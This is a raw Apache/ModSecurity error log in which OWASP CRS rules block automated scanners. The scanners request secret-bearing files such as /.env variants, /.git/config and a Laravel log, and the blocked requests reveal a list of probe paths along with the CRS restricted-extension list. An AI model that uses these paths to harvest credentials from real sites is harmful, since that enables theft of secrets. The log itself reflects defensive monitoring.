[Mon May 11 12:15:26.756057 2026] [security2:error] [pid 1256241:tid 1256252] [client 85.121.126.209:55800] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "info.autobuyes.com"] [uri "/storage/logs/laravel.log"] [unique_id "agGsPpkIEwRJMyDaV55WzgAAAUY"]
[Mon May 11 12:15:26.757708 2026] [security2:error] [pid 1256241:tid 1256252] [client 85.121.126.209:55800] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/storage/logs/laravel.log"] [unique_id "agGsPpkIEwRJMyDaV55WzgAAAUY"]
[Mon May 11 12:15:26.754139 2026] [security2:error] [pid 1254242:tid 1254257] [client 85.121.126.209:55894] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.env.bak"] [unique_id "agGsPr4KNmD_mZ_vlf9BdwAAAEw"]
[Mon May 11 12:15:26.759523 2026] [security2:error] [pid 1254242:tid 1254257] [client 85.121.126.209:55894] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.env.bak"] [unique_id "agGsPr4KNmD_mZ_vlf9BdwAAAEw"]
[Mon May 11 12:15:26.761393 2026] [security2:error] [pid 1254179:tid 1254198] [client 85.121.126.209:55848] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.env"] [unique_id "agGsPmS6k_SCYd1AVZq3VQAAARE"]
[Mon May 11 12:15:26.761593 2026] [security2:error] [pid 1254179:tid 1254198] [client 85.121.126.209:55848] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.env"] [unique_id "agGsPmS6k_SCYd1AVZq3VQAAARE"]
[Mon May 11 12:15:26.768978 2026] [security2:error] [pid 1254242:tid 1254252] [client 85.121.126.209:55902] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.env.staging"] [unique_id "agGsPr4KNmD_mZ_vlf9BdQAAAEc"]
[Mon May 11 12:15:26.772464 2026] [security2:error] [pid 1254242:tid 1254252] [client 85.121.126.209:55902] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.env.staging"] [unique_id "agGsPr4KNmD_mZ_vlf9BdQAAAEc"]
[Mon May 11 12:15:26.774140 2026] [security2:error] [pid 1254179:tid 1254199] [client 85.121.126.209:55960] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/app/.env"] [unique_id "agGsPmS6k_SCYd1AVZq3WQAAARI"]
[Mon May 11 12:15:26.775946 2026] [security2:error] [pid 1254179:tid 1254199] [client 85.121.126.209:55960] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/app/.env"] [unique_id "agGsPmS6k_SCYd1AVZq3WQAAARI"]
[Mon May 11 12:15:26.773993 2026] [security2:error] [pid 1254179:tid 1254200] [client 85.121.126.209:55762] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.git/config"] [unique_id "agGsPmS6k_SCYd1AVZq3WAAAARM"]
[Mon May 11 12:15:26.776839 2026] [security2:error] [pid 1254179:tid 1254200] [client 85.121.126.209:55762] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.git/config"] [unique_id "agGsPmS6k_SCYd1AVZq3WAAAARM"]
[Mon May 11 12:15:26.775096 2026] [security2:error] [pid 1254133:tid 1254151] [client 85.121.126.209:55852] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.env.example"] [unique_id "agGsPhjZymfuKpjWXeiFbAAAAM8"]
[Mon May 11 12:15:26.780885 2026] [security2:error] [pid 1254133:tid 1254151] [client 85.121.126.209:55852] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.env.example"] [unique_id "agGsPhjZymfuKpjWXeiFbAAAAM8"]
[Mon May 11 12:15:26.895728 2026] [authz_core:error] [pid 1254328:tid 1254339] [client 46.22.0.193:62156] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-extensions/acf-flo-flexible-content/error_log
[Mon May 11 12:15:28.779230 2026] [authz_core:error] [pid 1254328:tid 1254339] [client 46.22.0.193:62156] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-extensions/acf-flo-image/error_log
[Mon May 11 12:15:30.340092 2026] [security2:error] [pid 1256241:tid 1256268] [client 85.121.126.209:55898] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agGsPpkIEwRJMyDaV55W0AAAAVY"]
[Mon May 11 12:15:30.359406 2026] [security2:error] [pid 1254133:tid 1254146] [client 85.121.126.209:55946] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agGsPhjZymfuKpjWXeiFawAAAMo"]
[Mon May 11 12:15:30.388694 2026] [security2:error] [pid 1254133:tid 1254143] [client 85.121.126.209:55976] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agGsPhjZymfuKpjWXeiFZwAAAMc"]
[Mon May 11 12:15:30.839242 2026] [authz_core:error] [pid 1254328:tid 1254339] [client 46.22.0.193:62156] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-extensions/acf-flo-image/error_log
[Mon May 11 12:15:31.279464 2026] [security2:error] [pid 1254328:tid 1254336] [client 185.177.72.9:2116] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGsPURdw2n9wv6Ai48QFQAAAIU"]
[Mon May 11 12:15:31.306860 2026] [security2:error] [pid 1254328:tid 1254349] [client 85.121.126.209:55930] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agGsPkRdw2n9wv6Ai48QFgAAAJM"]
[Mon May 11 12:15:31.311821 2026] [security2:error] [pid 1254133:tid 1254138] [client 85.121.126.209:55866] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agGsPhjZymfuKpjWXeiFagAAAMI"]
[Mon May 11 12:15:31.886429 2026] [security2:error] [pid 1254328:tid 1254352] [client 85.121.126.209:55918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agGsPkRdw2n9wv6Ai48QGQAAAJc"]
[Mon May 11 12:15:31.930974 2026] [security2:error] [pid 1254212:tid 1254226] [client 85.121.126.209:55862] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agGsPkYQeUtAPynIs6xhPQAAAAw"]
[Mon May 11 12:15:32.415908 2026] [security2:error] [pid 1254133:tid 1254145] [client 85.121.126.209:55872] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agGsPhjZymfuKpjWXeiFaAAAAMk"]
[Mon May 11 12:15:33.136649 2026] [authz_core:error] [pid 1254328:tid 1254339] [client 46.22.0.193:62156] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-extensions/acf-flo-instagram/error_log
[Mon May 11 12:15:35.035500 2026] [authz_core:error] [pid 1254328:tid 1254339] [client 46.22.0.193:62156] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-extensions/acf-flo-stylekit-selector/error_log
[Mon May 11 12:15:35.064570 2026] [security2:error] [pid 1254242:tid 1254252] [client 85.121.126.209:55902] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agGsPr4KNmD_mZ_vlf9BdQAAAEc"]
[Mon May 11 12:15:35.677221 2026] [security2:error] [pid 1254179:tid 1254200] [client 85.121.126.209:55762] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agGsPmS6k_SCYd1AVZq3WAAAARM"]
[Mon May 11 12:15:36.481240 2026] [security2:error] [pid 1254328:tid 1254335] [client 85.121.126.209:55882] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agGsPkRdw2n9wv6Ai48QGgAAAIQ"]
[Mon May 11 12:15:36.799728 2026] [security2:error] [pid 1254242:tid 1254257] [client 85.121.126.209:55894] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agGsPr4KNmD_mZ_vlf9BdwAAAEw"]
[Mon May 11 12:15:36.858359 2026] [security2:error] [pid 1256241:tid 1256252] [client 85.121.126.209:55800] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agGsPpkIEwRJMyDaV55WzgAAAUY"]
[Mon May 11 12:15:37.234690 2026] [authz_core:error] [pid 1254328:tid 1254339] [client 46.22.0.193:62156] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-extensions/acf-flo-stylekit-selector/error_log
[Mon May 11 12:15:37.497226 2026] [security2:error] [pid 1254133:tid 1254151] [client 85.121.126.209:55852] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agGsPhjZymfuKpjWXeiFbAAAAM8"]
[Mon May 11 12:15:37.821845 2026] [security2:error] [pid 1254179:tid 1254198] [client 85.121.126.209:55848] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agGsPmS6k_SCYd1AVZq3VQAAARE"]
[Mon May 11 12:15:37.888380 2026] [security2:error] [pid 1254179:tid 1254199] [client 85.121.126.209:55960] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agGsPmS6k_SCYd1AVZq3WQAAARI"]
[Mon May 11 12:15:37.954295 2026] [security2:error] [pid 1254133:tid 1254158] [client 85.121.126.209:55958] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agGsPhjZymfuKpjWXeiFaQAAANY"]
[Mon May 11 12:15:39.326661 2026] [authz_core:error] [pid 1254328:tid 1254339] [client 46.22.0.193:62156] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-extensions/acf-flo-template-selector/error_log
[Mon May 11 12:15:48.367813 2026] [authz_core:error] [pid 1254328:tid 1254339] [client 46.22.0.193:62156] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-extensions/acf-flo-video-tutorial/error_log
[Mon May 11 12:15:50.035816 2026] [authz_core:error] [pid 1254328:tid 1254339] [client 46.22.0.193:62156] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-extensions/acf-flo-video-tutorial/error_log
[Mon May 11 12:15:51.691936 2026] [authz_core:error] [pid 1254328:tid 1254339] [client 46.22.0.193:62156] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-extensions/acf-flo-video-tutorial/error_log
[Mon May 11 12:15:56.306506 2026] [security2:error] [pid 1254242:tid 1254256] [client 185.177.72.9:45184] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react/.env.backup.template"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/react/.env.backup.template"] [unique_id "agGsXL4KNmD_mZ_vlf9BoAAAAEs"]
[Mon May 11 12:15:56.309924 2026] [security2:error] [pid 1254242:tid 1254256] [client 185.177.72.9:45184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/react/.env.backup.template"] [unique_id "agGsXL4KNmD_mZ_vlf9BoAAAAEs"]
[Mon May 11 12:15:58.501651 2026] [security2:error] [pid 1254242:tid 1254256] [client 185.177.72.9:45184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGsXL4KNmD_mZ_vlf9BoAAAAEs"]
[Mon May 11 12:15:58.525547 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:45194] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react/.env.backup.template"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/react/.env.backup.template"] [unique_id "agGsXr4KNmD_mZ_vlf9BowAAAEY"]
[Mon May 11 12:15:58.525755 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:45194] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/react/.env.backup.template"] [unique_id "agGsXr4KNmD_mZ_vlf9BowAAAEY"]
